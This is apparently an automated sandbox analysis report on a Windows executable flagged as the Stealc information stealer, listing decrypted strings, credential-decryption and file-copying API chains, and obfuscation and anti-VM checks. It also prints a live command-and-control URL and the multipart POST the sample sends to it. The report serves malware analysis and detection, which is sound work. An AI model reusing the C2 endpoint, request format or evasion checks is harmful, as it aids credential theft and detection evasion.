                Source: 0.2.file.exe.810000.0.unpackString decryptor: https
                Source: 0.2.file.exe.810000.0.unpackString decryptor: Content-Type: multipart/form-data; boundary=----
                Source: 0.2.file.exe.810000.0.unpackString decryptor: POST
                Source: 0.2.file.exe.810000.0.unpackString decryptor: HTTP/1.1
                Source: 0.2.file.exe.810000.0.unpackString decryptor: Content-Disposition: form-data; name="
                Source: 0.2.file.exe.810000.0.unpackString decryptor: hwid
                Source: 0.2.file.exe.810000.0.unpackString decryptor: build
                Source: 0.2.file.exe.810000.0.unpackString decryptor: token
                Source: 0.2.file.exe.810000.0.unpackString decryptor: file_name
                Source: 0.2.file.exe.810000.0.unpackString decryptor: file
                Source: 0.2.file.exe.810000.0.unpackString decryptor: message
                Source: 0.2.file.exe.810000.0.unpackString decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
                Source: 0.2.file.exe.810000.0.unpackString decryptor: screenshot.jpg
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00829030 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA | 0_2_00829030
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008172A0 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree | 0_2_008172A0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0081A2B0 CryptUnprotectData,LocalAlloc,LocalFree | 0_2_0081A2B0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0081A210 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree | 0_2_0081A210
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0081C920 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat | 0_2_0081C920
                Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2050733563.000000000528B000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2050733563.000000000528B000.00000004.00001000.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008240F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose | 0_2_008240F0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0081E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA | 0_2_0081E530
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0081F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_0081F7B0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008247C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen | 0_2_008247C0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00811710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00811710
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0081DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose | 0_2_0081DB80
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00823B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose | 0_2_00823B00
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00824B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00824B60
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0081EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose | 0_2_0081EE20
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0081BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose | 0_2_0081BE40
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0081DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_0081DF10

                Networking

                Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.206:80
                Source: Malware configuration extractor | URLs: http://185.215.113.206/6c4adf523b719729.php
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1
                    Host: 185.215.113.206
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                Source: global traffic | HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1
                    Content-Type: multipart/form-data; boundary=----GHDAAKJEGCFCAKEBKJJE
                    Host: 185.215.113.206
                    Content-Length: 211
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Data Raw: 2d 2d 2d 2d 2d 2d 47 48 44 41 41 4b 4a 45 47 43 46 43 41 4b 45 42 4b 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 33 33 41 32 46 46 45 38 41 34 32 39 33 36 30 35 30 34 37 36 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 41 41 4b 4a 45 47 43 46 43 41 4b 45 42 4b 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 41 41 4b 4a 45 47 43 46 43 41 4b 45 42 4b 4a 4a 45 2d 2d 0d 0a
                    Data Ascii (CRLF line breaks restored from the raw bytes):
                    ------GHDAAKJEGCFCAKEBKJJE
                    Content-Disposition: form-data; name="hwid"

                    F133A2FFE8A42936050476
                    ------GHDAAKJEGCFCAKEBKJJE
                    Content-Disposition: form-data; name="build"

                    tale
                    ------GHDAAKJEGCFCAKEBKJJE--
                Source: Joe Sandbox View | IP Address: 185.215.113.206 185.215.113.206
                Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206 (reported 7 times)
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008162D0 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle | 0_2_008162D0
                Source: unknown | HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1
                    Content-Type: multipart/form-data; boundary=----GHDAAKJEGCFCAKEBKJJE
                    Host: 185.215.113.206
                    Content-Length: 211
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Data Raw: 2d 2d 2d 2d 2d 2d 47 48 44 41 41 4b 4a 45 47 43 46 43 41 4b 45 42 4b 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 33 33 41 32 46 46 45 38 41 34 32 39 33 36 30 35 30 34 37 36 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 41 41 4b 4a 45 47 43 46 43 41 4b 45 42 4b 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 41 41 4b 4a 45 47 43 46 43 41 4b 45 42 4b 4a 4a 45 2d 2d 0d 0a
                    Data Ascii (CRLF line breaks restored from the raw bytes):
                    ------GHDAAKJEGCFCAKEBKJJE
                    Content-Disposition: form-data; name="hwid"

                    F133A2FFE8A42936050476
                    ------GHDAAKJEGCFCAKEBKJJE
                    Content-Disposition: form-data; name="build"

                    tale
                    ------GHDAAKJEGCFCAKEBKJJE--
                Source: file.exe, 00000000.00000002.2092013993.00000000015DE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206
                Source: file.exe, 00000000.00000002.2092013993.000000000163D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2092013993.00000000015DE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/
                Source: file.exe, 00000000.00000002.2092013993.0000000001636000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2092013993.00000000015DE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php
                Source: file.exe, 00000000.00000002.2092013993.000000000163D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php/
                Source: file.exe, 00000000.00000002.2092013993.0000000001636000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpA%%
                Source: file.exe, 00000000.00000002.2092013993.0000000001636000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpm%A
                Source: file.exe, file.exe, 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2050733563.000000000528B000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support

                System Summary

                Source: file.exe | Static PE information: section name:
                Source: file.exe | Static PE information: section name: .rsrc
                Source: file.exe | Static PE information: section name: .idata
                Source: file.exe | Static PE information: section name:
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00850098 | 0_2_00850098
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0086B198 | 0_2_0086B198
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C17153 | 0_2_00C17153
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00842138 | 0_2_00842138
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C742CC | 0_2_00C742CC
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00854288 | 0_2_00854288
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C6A2F5 | 0_2_00C6A2F5
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0087E258 | 0_2_0087E258
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0088D39E | 0_2_0088D39E
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0089B308 | 0_2_0089B308
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008545A8 | 0_2_008545A8
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0087D5A8 | 0_2_0087D5A8
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0083E544 | 0_2_0083E544
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00834573 | 0_2_00834573
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BDC692 | 0_2_00BDC692
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CEC68B | 0_2_00CEC68B
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008566C8 | 0_2_008566C8
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008996FD | 0_2_008996FD
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0088A648 | 0_2_0088A648
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00886799 | 0_2_00886799
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C687FA | 0_2_00C687FA
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C727B0 | 0_2_00C727B0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C6D7BE | 0_2_00C6D7BE
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0086D720 | 0_2_0086D720
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0086B8A8 | 0_2_0086B8A8
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008698B8 | 0_2_008698B8
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0087F8D6 | 0_2_0087F8D6
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CE2854 | 0_2_00CE2854
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00864868 | 0_2_00864868
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BDEA81 | 0_2_00BDEA81
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BB0A5B | 0_2_00BB0A5B
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00880B88 | 0_2_00880B88
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00884BA8 | 0_2_00884BA8
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00878BD9 | 0_2_00878BD9
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C70CD4 | 0_2_00C70CD4
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0088AC28 | 0_2_0088AC28
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B59C1C | 0_2_00B59C1C
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00865DB9 | 0_2_00865DB9
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00864DC8 | 0_2_00864DC8
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0087AD38 | 0_2_0087AD38
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0086BD68 | 0_2_0086BD68
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C6BD31 | 0_2_00C6BD31
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00841D78 | 0_2_00841D78
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00881EE8 | 0_2_00881EE8
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BBFE34 | 0_2_00BBFE34
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C75E08 | 0_2_00C75E08
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00858E78 | 0_2_00858E78
                Source: C:\Users\user\Desktop\file.exe | Code function: String function: 00814610 appears 316 times
                Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exe | Static PE information: Section: eysgbrhc ZLIB complexity 0.9946271392490953
                Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00829790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle | 0_2_00829790
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00823970 CoCreateInstance,MultiByteToWideChar,lstrcpyn | 0_2_00823970
                Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\UNET20J1.htm
                Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
                Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
                Source: file.exe | Static file information: File size 2136064 > 1048576
                Source: file.exe | Static PE information: Raw size of eysgbrhc is bigger than: 0x100000 < 0x19e800
                Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2050733563.000000000528B000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2050733563.000000000528B000.00000004.00001000.00020000.00000000.sdmp

                Data Obfuscation

                Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.810000.0.unpack :EW;.rsrc :W;.idata :W; :EW;eysgbrhc:EW;qcadwkiz:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;eysgbrhc:EW;qcadwkiz:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00829BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_00829BB0
                Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
                Source: file.exe | Static PE information: real checksum: 0x213ba5 should be: 0x2139b7
                Source: file.exe | Static PE information: section name:
                Source: file.exe | Static PE information: section name: .rsrc
                Source: file.exe | Static PE information: section name: .idata
                Source: file.exe | Static PE information: section name:
                Source: file.exe | Static PE information: section name: eysgbrhc
                Source: file.exe | Static PE information: section name: qcadwkiz
                Source: file.exe | Static PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D490D6 push ecx; mov dword ptr [esp], eax | 0_2_00D49108
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CF00DA push 7F47E222h; mov dword ptr [esp], ebp | 0_2_00CF0124
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CF00DA push ebx; mov dword ptr [esp], 3FFFAAF0h | 0_2_00CF0165
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CD0099 push edx; mov dword ptr [esp], edi | 0_2_00CD00CA
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0083A0DC push eax; retf | 0_2_0083A0F1
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D09059 push edi; mov dword ptr [esp], 7FE58ABFh | 0_2_00D09077
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CD01CE push ecx; mov dword ptr [esp], edi | 0_2_00CD0200
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D131F6 push ecx; mov dword ptr [esp], 50082635h | 0_2_00D13255
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D131F6 push 2A801711h; mov dword ptr [esp], edi | 0_2_00D132F4
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CF91E4 push edi; mov dword ptr [esp], 550EB652h | 0_2_00CF924D
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CF91E4 push edx; mov dword ptr [esp], edi | 0_2_00CF9275
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CF91E4 push ecx; mov dword ptr [esp], edi | 0_2_00CF9295
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D891E9 push esi; mov dword ptr [esp], ebx | 0_2_00D8924E
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CFF1F5 push ebp; mov dword ptr [esp], edi | 0_2_00CFF24C
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CFF1F5 push ebp; mov dword ptr [esp], edi | 0_2_00CFF265
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CFF1F5 push 00F0F75Bh; mov dword ptr [esp], esi | 0_2_00CFF2AB
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D51194 push ebx; mov dword ptr [esp], esp | 0_2_00D51A5C
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CF11AC push 5EA1480Dh; mov dword ptr [esp], eax | 0_2_00CF11DD
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0083A109 push eax; retf | 0_2_0083A119
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C17153 push 3C176B1Fh; mov dword ptr [esp], edi | 0_2_00C1716E
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C17153 push edx; mov dword ptr [esp], ecx | 0_2_00C17172
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C17153 push 252DD2F1h; mov dword ptr [esp], edx | 0_2_00C171F9
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C17153 push ecx; mov dword ptr [esp], edi | 0_2_00C17292
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C17153 push edx; mov dword ptr [esp], 5E0B6C4Dh | 0_2_00C17313
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C7A103 push 3E170CD5h; mov dword ptr [esp], ebx | 0_2_00C7A128
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C742CC push 773CBDB9h; mov dword ptr [esp], edi | 0_2_00C7440F
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C742CC push ebx; mov dword ptr [esp], 7FEBB069h | 0_2_00C74414
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C742CC push ebx; mov dword ptr [esp], 2B91EDC1h | 0_2_00C74556
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C742CC push 2DE14D73h; mov dword ptr [esp], edx | 0_2_00C74565
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C742CC push 598D402Ch; mov dword ptr [esp], edi | 0_2_00C74617
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C742CC push ecx; mov dword ptr [esp], ebp | 0_2_00C7475F
                Source: file.exe | Static PE information: section name: eysgbrhc entropy: 7.952388640493053

                Boot Survival

                Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
                Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
                Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00829BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_00829BB0

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess | graph_0-37693
                Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
                Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C66850 second address: C66856 instructions: 0x00000000 rdtsc; 0x00000002 pushad; 0x00000003 popad; 0x00000004 pop edx; 0x00000005 pop eax; 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C79B62 second address: C79B66 instructions: 0x00000000 rdtsc; 0x00000002 push eax; 0x00000003 push edx; 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C79B66 second address: C79B6F instructions: 0x00000000 rdtsc; 0x00000002 pop edx; 0x00000003 pop eax; 0x00000004 pop edx; 0x00000005 pop eax; 0x00000006 pushad; 0x00000007 push eax; 0x00000008 push edx; 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C79CEC second address: C79D09 instructions: 0x00000000 rdtsc; 0x00000002 push esi; 0x00000003 pop esi; 0x00000004 push ebx; 0x00000005 pop ebx; 0x00000006 pop edx; 0x00000007 pop eax; 0x00000008 push esi; 0x00000009 pushad; 0x0000000a popad; 0x0000000b jmp 00007F6074F511FDh; 0x00000010 pop esi; 0x00000011 push eax; 0x00000012 push edx; 0x00000013 push eax; 0x00000014 push edx; 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C79D09 second address: C79D0D instructions: 0x00000000 rdtsc; 0x00000002 pop edx; 0x00000003 pop eax; 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C79EA7 second address: C79EB7 instructions: 0x00000000 rdtsc; 0x00000002 push edx; 0x00000003 pop edx; 0x00000004 pop edx; 0x00000005 pop eax; 0x00000006 jmp 00007F6074F511FAh; 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C79EB7 second address: C79EBF instructions: 0x00000000 rdtsc; 0x00000002 push eax; 0x00000003 push edx; 0x00000004 pushad; 0x00000005 popad; 0x00000006 push eax; 0x00000007 push edx; 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C79EBF second address: C79EC3 instructions: 0x00000000 rdtsc; 0x00000002 pop edx; 0x00000003 pop eax; 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C79EC3 second address: C79ECC instructions: 0x00000000 rdtsc; 0x00000002 pushad; 0x00000003 popad; 0x00000004 pop edx; 0x00000005 pop eax; 0x00000006 pushad; 0x00000007 push eax; 0x00000008 push edx; 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C7CB70 second address: C7CB7E instructions: 0x00000000 rdtsc; 0x00000002 push ecx; 0x00000003 pop ecx; 0x00000004 pop edx; 0x00000005 pop eax; 0x00000006 pop edi; 0x00000007 push eax; 0x00000008 push eax; 0x00000009 push edx; 0x0000000a push edx; 0x0000000b push ecx; 0x0000000c pop ecx; 0x0000000d pop edx; 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C7CB7E second address: C7CBA2 instructions: 0x00000000 rdtsc; 0x00000002 jmp 00007F6074D9F9F6h; 0x00000007 pop edx; 0x00000008 pop eax; 0x00000009 mov eax, dword ptr [esp+04h]; 0x0000000d push eax; 0x0000000e push edx; 0x0000000f push eax; 0x00000010 push edx; 0x00000011 pushad; 0x00000012 popad; 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C7CBA2 second address: C7CBA6 instructions: 0x00000000 rdtsc; 0x00000002 push eax; 0x00000003 push edx; 0x00000004 rdtsc
